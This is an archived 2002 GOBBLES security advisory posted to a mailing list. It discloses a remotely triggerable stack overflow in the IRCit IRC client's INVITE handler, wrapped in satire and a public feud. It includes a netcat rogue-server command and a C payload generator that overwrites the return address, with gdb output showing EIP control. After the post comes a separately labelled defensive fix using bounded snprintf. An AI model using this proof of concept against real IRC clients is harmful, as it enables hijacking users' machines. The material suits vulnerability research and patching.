Remote Hole in IRC Client and Stuff

From: gobblesat_private
Date: Wed Jun 12 2002 - 08:27:59 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    GOBBLES (http://www.bugtraq.org)
    ================================
    
    GOBBLES Security Labs (GSL) is currently the largest non-profit security
    team in the world, with over 17 active members that are dedicated to
    bringing cutting edge material to the public that other groups are too
    afraid and/or selfish to do.  Unlike some groups, GSL is at least honest
    about their intentions -- GSL members want fame and glory.  We're not
    out to make friends (re: fat kid).
    
     ____________________
    < GOBBLES LOVE ROUTE >
     --------------------
      \                                  ,+*^^*+___+++_
       \                           ,*^^^^              )
        \                       _+*                     ^**+_
         \                    +^       _ _++*+_+++_,         )
                  _+^^*+_    (     ,+*^ ^          \+_        )
                 {       )  (    ,(    ,_+--+--,      ^)      ^\
                { (@)    } f   ,(  ,+-^ __*_*_  ^^\_   ^\       )
               {:;-/    (_+*-+^^^^^+*+*<_ _++_)_    )    )      /
              ( /  (    (        ,___    ^*+_+* )   <    <      \
               U _/     )    *--<  ) ^\-----++__)   )    )       )
                (      )  _(^)^^))  )  )\^^^^^))^*+/    /       /
              (      /  (_))_^)) )  )  ))^^^^^))^^^)__/     +^^
             (     ,/    (^))^))  )  ) ))^^^^^^^))^^)       _)
              *+__+*       (_))^)  ) ) ))^^^^^^))^^^^^)____*^
              \             \_)^)_)) ))^^^^^^^^^^))^^^^)
               (_             ^\__^^^^^^^^^^^^))^^^^^^^)
                 ^\___            ^\__^^^^^^))^^^^^^^^)\\
                      ^^^^^\uuu/^^\uuu/^^^^\^\^\^\^\^\^\^\
                         ___) >____) >___   ^\_\_\_\_\_\_\)
                        ^^^//\\_^^//\\_^       ^(\_\_\_\)
                          ^^^ ^^ ^^^ ^
    
    
    ABOUT THIS RELEASE
    ==================
    
    This is an emergency release.  Politics are involved.  Comic advisory
    coming soon.  Thank you for understanding situation.
    
    
    POTENTIAL REMOTE ROOT VULNERABILITY IN IRCit IRC CLIENT (POSSIBLY MORE)
    ========================================================================
    
    Everyone knows that compromising an IRC client is the first step in
    hacking a "secure" operating system developer's personal IRC shell
    server.  Hence this leads to the first of few steps to gain root on such
    a machine.
    
    GOBBLES Security members have found an exploitable remote vulnerability
    in the IRCit IRC Client, which can be downloaded from:
    	http://www.asymmetrica.com/software/ircit/
    
    IRCit is very dangerous software in all respects. As it claims to be IRC
    client for Information Terrorists. Proceed with caution and extreme
    prejudice. For details read rest of advisory hehehe ;PPppPPPP
    
    
    SOFTWARE VERSIONS AFFECTED
    ==========================
    . . . at least the Current version, turkey not going to waste he time
          and take look at old versions to post big long useless list of
          all vulnerable versions, and likewise not going to look for same
          bug occurring in clients and clients derived from this client, and
          clients derived from same client this one was derived from, this
          is task for Team Bugtraq (bugtraqat_private) and for Team
          Vuln-Dev (vuln-devat_private) to do.  GOBBLES not going to
          waste he time, when there political agenda to be taken care of in
          this advisory.
    
    
    MISCELLANEOUS ERRATA
    ====================
    
    First, it was brought to the world's attention here that monkey.org had
    been compromised and dugsong distributions were backdoored [1].
    
    Then, here [2] we see doug sniff talking about how his server was
    compromised, and he mentions a REMOTE CLIENT SIDE HOLE in a popular IRC
    client Epic[3], which was used in the hack of his server (or crack, if
    you have too much ego to admit to being compromised by someone more
    skilled than yourself, as the case seems to be).
    
    We like to quote useless IETF drafts [4] and RFC's [5] in our advisories
    and other publications to show off that we're smart and read a lot of
    worthless papers, like real skilled geeks do.
    
    After reading this, GOBBLES Security members did visit www.epicsol.org
    and looked for information about this dastardly remote exploit that
    aids in the remote root compromise of an OpenBSD developer and self
    proclaimed security expert's personal machine, and found no mention of a
    vulnerability, including no mention of it in the CHANGELOG[6].
    
    Members of GOBBLES Security then tried to contact doug sniff via email [7],
    who ignored our inquiries concerning the bug.
    
    We then approached whitehat[8] w00w00 leader Shok[9] to see if he could
    share any details on this w00w00-known 0day vulnerability in one of the
    most popular IRC clients.  He also refused to even acknowledge us.
    
    Members of GOBBLES Security then attempted to post to mailing lists,
    such as bugtraq[10] and vulndev[11] concerning this quasi-known
    vulnerability, and were disappointed to see that all our posts on the
    matter were rejected.
    
    We then proceeded to browse through our collection of DEAR DIARY notes
    concerning vulnerabilities that we have discovered during various audits
    that we have not yet had the time to write advisories for, to see if we
    had any information on a remote hole in Epic.  It turns out, we've yet
    to audit that client, but plan on it in the near future.
    
    We did come across notes regarding a somewhat related hole, which was
    written up into this very advisory that you are now reading.
    
    
    TECHNICAL DETAILS
    =================
    
    GOBBLES-bugsquasher.c find following situation with full alert red flags
    in IRCit serverr.c sourcecode:
    
    ...
    
    STD_IRC_SERVER(sINVITE)
    
     {
      char *n,
           *h,
           *v;
    
     if (n=splitn(&from), !from)  from="*@*";
        if (v=splitw(&rest), ((rest)&&(*rest==':')))  rest++;
    
        if ((mt_ptr->c_ignore&IG_INVITE)==0)
         {
          char s[MAXHOSTLEN];
    
           FIXIT(from);
           sprintf (s, "%s!%s", n, from);
    ...
    
    GOBBLES is not even going to comment on where he think problem is. Rogue
    IRC server that allow bad clients can allow the hijacking of IRCit information
    terrorist client by inviting he client to execute arbitrary code.
    
    EXPLOIT
    =======
    
    To exploit GOBBLES use he #1 whitehat penetrator tool netcat:
    
    $ echo ":x"'!'`./GOBBLES-invite 0xcafebabe`"@x INVITE you :#GOBBLES" | nc -l -p 6667
    
    GOBBLES cut and paste he code especially for friend Al Huger:
    
    /* GOBBLES-invite.c */
    
    #include <stdio.h>
    #include <stdlib.h>     /* exit() */
    #include <string.h>     /* memset() */
    
    int
    main(int argc, char **argv)
    {
            char heh[175], *store;
            int i;
    
            if(argc == 1) exit(0);
    
            /* argv[1] is the address written into the 174-byte filler */
            sscanf(argv[1], "%p", &store);
            memset(heh, 'x', sizeof(heh));
            *(long *)&heh[166] = (long)store;
            *(long *)&heh[170] = (long)store;
            heh[174] = '\0';
    
            fprintf(stdout, "%s", heh);
            exit(0);
    }
    
    When GOBBLES connect he IRCit client he notice following in resulting
    coredump:
    
    (gdb) info reg eip
    eip            0xcafebabe       0xcafebabe
    (gdb)
    
    That mean GOBBLES now have remotely exploitable bug of EPIC proportions
    in IRCit irc client for information terrorists.
    
    
    VENDOR NOTIFICATION STATUS
    ==========================
    
    GOBBLES in security for fame, not friends.  GOBBLES often criticized and
    immature method of not contacting vendor/programmer team come into play
    once more today, and this advisory sent out without any notification.
    Please divert flames from /dev/null stuff and send them to
    GOBBLESat_private so we all can sit in #!GOBBLES on irc looking at
    angry mails from critics calling us immature and stuff.
    
    
    GREETZ
    ======
    
    all of w00w00, all of monkey.org, friends from Summercon 2002 (When are
    videos going to get put online of GOBBLES speech?!!? HURRY THIS
    EMERGENCY!#) including everyone whose name that GOBBLES already forget,
    especially nice people who buy dinner for GOBBLES, gweeds (thanks for
    free redbull), sl0ppy for being ethical and reading our email (hehe we
    love you anyway, GOBBLES still beat you in Greatest Hacks competition by
    one place though!!!), twd for discussing future of GOBBLES Security in
    relation to his ezine, and to girl who apologize profusely to naked
    GOBBLES for laughing at him during speech, hehehe ;PPPPpppp
    
    Speech notes and pornography will be available online very soon from
    Summercon, hehe, "GOBBLES LOVE ROUTE" and stuff, right now GOBBLES
    working on figuring out hosting issue to thwart wget-based ddos he
    website already experience (advisory coming soon on this subject).
    
    Double standards rule.
    
    
    CLOSING
    =======
    
    Anyone who has pictures from Summercon 2002, please mail them to us
    (GOBBLESat_private), thanks!
    
    Remember, full disclosure is good, especially if political vendetta can
    be aired to the public in a w00w00 style hidden in such subtle manner as
    within security advisory.
    
    If you could provide the community with details concerning this so-called
    "Remote Root" hole in Epic, please do not hesitate to do so!  Teasing
    the academic/professional security community with rumors of exploits is
    not an appropriate action for anyone who wants to call themselves a
    whitehat!
    
    
    [1] http://archives.neohapsis.com/archives/bugtraq/2002-05/0281.html
    [2] http://archives.neohapsis.com/archives/bugtraq/2002-05/0285.html
    [3] http://www.epicsol.org
    [4] http://www.ietf.org/ids.by.wg/webdav.html
    [5] http://www.rfc-editor.org/cgi-bin/rfcdoctype.pl?loc=RFC&letsgo=1459&type=ftp&file_format=txt
    [6] http://www.epicsol.org/changelog.phtml
    [7] dugsongat_private (doug sniff)
    [8] http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0672.html
    [9] shokat_private (Matt Conover)
    [10] http://archives.neohapsis.com/archives/vuln-dev/
    [11] http://archives.neohapsis.com/archives/bugtraq/
    
    
    
    
    
    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.1
    Note: This signature can be verified at https://www.hushtools.com
    
    wlwEARECABwFAj0HaMAVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAP9+4A
    n3XI0qqEJoZURxozpAhF6uBQenmoAJ9D1bXamS844pgNzwSUM7wKIn7/1Q==
    =5s6i
    -----END PGP SIGNATURE-----
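The sINVITE handler quoted in the advisory builds "nick!user@host" with an unbounded sprintf() into a fixed s[MAXHOSTLEN], which is what lets an oversized INVITE prefix clobber the stack. The following is an added example, not IRCit's code and not part of the post: the bounded construction and length check a patched client would apply, with MAXHOSTLEN assumed to be 128 and the sample lines constructed here, since the advisory gives neither.

```c
#include <stdio.h>
#include <string.h>

#define MAXHOSTLEN 128          /* assumed value for this example only */

/* Bounded replacement for the handler's sprintf(s, "%s!%s", n, from).
 * Returns 0 when the result fits in s, -1 when it would have overflowed. */
int build_invite_source(const char *n, const char *from, char *s, size_t slen)
{
    int needed = snprintf(s, slen, "%s!%s", n, from);
    if (needed < 0 || (size_t)needed >= slen) {
        s[0] = '\0';            /* never use a truncated prefix */
        return -1;
    }
    return 0;
}

/* Parse ":nick!user@host INVITE target :#chan" and build the source string
 * with the bounded helper. Returns 0 if it fits, -1 if the line is
 * malformed or the prefix is too long for s. */
int check_invite_line(const char *line, char *s, size_t slen)
{
    char buf[2048], *bang, *cmd;

    if (line[0] != ':' || strlen(line) >= sizeof buf)
        return -1;
    strcpy(buf, line + 1);          /* buf starts with "nick!user@host" */
    cmd = strchr(buf, ' ');
    if (cmd == NULL || strncmp(cmd + 1, "INVITE ", 7) != 0)
        return -1;
    *cmd = '\0';
    bang = strchr(buf, '!');
    if (bang == NULL)               /* no user@host: handler uses "*@*" */
        return build_invite_source(buf, "*@*", s, slen);
    *bang = '\0';
    return build_invite_source(buf, bang + 1, s, slen);
}

/* Constructed inputs: a normal invite (oversized == 0), or one whose nick
 * is 174 'x' bytes, the filler length the post's generator emits. */
int demo_check(int oversized)
{
    char line[256], s[MAXHOSTLEN];
    if (!oversized)
        return check_invite_line(":gobbles!g@example.test INVITE you :#chan", s, sizeof s);
    line[0] = ':';
    memset(line + 1, 'x', 174);
    line[175] = '\0';
    strcat(line, "!u@h INVITE you :#chan");
    return check_invite_line(line, s, sizeof s);
}
```

With the check in place the oversized prefix is rejected before any copy into the fixed buffer, so the coredump the advisory shows cannot occur.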
    



    This archive was generated by hypermail 2b30 : Wed Jun 12 2002 - 08:51:37 PDT